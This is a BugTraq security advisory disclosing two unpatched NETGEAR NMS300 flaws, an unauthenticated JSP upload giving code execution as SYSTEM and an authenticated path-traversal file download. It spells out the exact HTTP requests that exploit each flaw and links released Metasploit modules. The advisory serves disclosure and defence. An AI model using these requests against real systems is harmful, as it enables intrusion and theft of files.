BugTraq
[CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300 Feb 04 2016 12:04AM
Pedro Ribeiro (pedrib gmail com)
Hi,

CERT/CC has helped me disclose two vulnerabilities in NETGEAR's
Pro"safe" Network Management System 300 [1]. Two classical bugs: one
remote code execution via arbitrary file upload and an authenticated
arbitrary file download.

The full advisory can be seen in my repo at [2] and it is also pasted
below. I've also released two Metasploit modules to exploit these
vulnerabilities [3][4].

There is currently no fix for these - do not expose NMS300 to the
Internet! I've decided to release the exploits anyway as CERT's advisory
details how the vulnerability can be exploited.

Regards,
Pedro

[1] https://www.kb.cert.org/vuls/id/777024
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_n
ms_rce.txt
[3] https://github.com/rapid7/metasploit-framework/pull/6530
[4] https://github.com/rapid7/metasploit-framework/pull/6531

>> Remote code execution / arbitrary file download in NETGEAR ProSafe
Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib (at) gmail (dot) com [email concealed]), Agile Information
Security (http://www.agileinfosec.co.uk/)
========================================================================
==
Disclosure: 04/02/2016 / Last updated: 04/02/2016

>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.

The NETGEAR Management System NMS300 delivers insight into network
elements, including third-party devices. An intuitive, web-based user
interface makes it easier to monitor and administer an entire network."

>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows
systems. It has serious two vulnerabilities that can be exploited by a
remote attacker. The first one is an arbitrary file upload vulnerability
that allows an unauthenticated attacker to execute Java code as the
SYSTEM user.
The second vulnerability is an arbitrary file download that allows an
authenticated user to download any file from the host that is running
NMS300.

A special thanks to Joel Land of CERT/CC for helping disclose this
vulnerability under ID 777024 [1]. Two new Metasploit modules that
exploit these vulnerabilities have been released.

>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload
(unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload

@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload

The JSP file can be uploaded as shown below, it will be named
null[name].[extension] and can be reached on
http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final
file will be named "nulltesting.jsp". [name] and [extension] can be seen
in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data;
boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata";
filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--

#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the
path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on
C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceTyp
e=4&deviceModel=FS526Tv2&description=bla

b) Obtain the file identifier (imageId) for the image that was created
by scraping the page below for "imagename.img" (the fileName parameter
in step 1):
POST /data/getPage.do?method=getPageList&type=configImgManager
everyPage=10000

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1
,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.
img","createTime":"10/03/2015
21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor
":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","
sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"
}

c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=<ID>

>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to
the Internet or any unstrusted networks.

>> References:
[1] https://www.kb.cert.org/vuls/id/777024

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJWspVxAAoJEOToNW8ubuEaOiwP/A29/ze6cFI3/zaj188iiX+n
KBk6gohecJgQbvlLG7mIkHiA7WpHLWYYWlwAj3uoYZdgZLrGigKClYa+4H7Vt4d9
hj7h8VOL23Bz0Yd4/+EeAbWuZ7CKxJNMAx+tKumkHECHDzZobz8X1JNK6Y0mgSGZ
85osoX6qWGQMo9hhoFVzBlp1fWA4lA97sY3HqM+JOrspHrN7O+tobMfVCg7Du8LV
WIHZ1M5lOr7DnjwZtVOQJula0awDnvdNGxZicm3cAGibsGoFlVGwLw7f3PbKreGr
UbUJJ1F/dwPQjL52UTuWrFAgSC1/R9e75DjFIIJ6uSPZQNJYPzWlHhNTRvBOuTix
KcMA7HOjSfQV5T9RaOv4S7p1V9K3gO+xpVZleauzG4dGTiHdlb2lU00sUASgkvEi
ea8oBVaqZgozYEq1e9m19vHNhi529nPH/zw8Si2V2qMIcUd6HAaHvDY1HZ2FxDMx
GniRGf+j0nvG4gn2FdliE0XAENdhZjcjP9CUZ7ypYMjVsHkR9F/xbmuZm/xjSY05
0MttFyyrpsTNQ7ozxJh0CJrLXbH575fZQVvPjBXe7T2tPB+WAiY4ssqO6FodjIjj
7vVcnLZvaljwjInQtz64qF15T0Dj+cf1j5RSvISH5x9ia919YrDBnDyByW8CF6rd
CF78xlW4iJIJFJOdkP0E
=9A+W
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus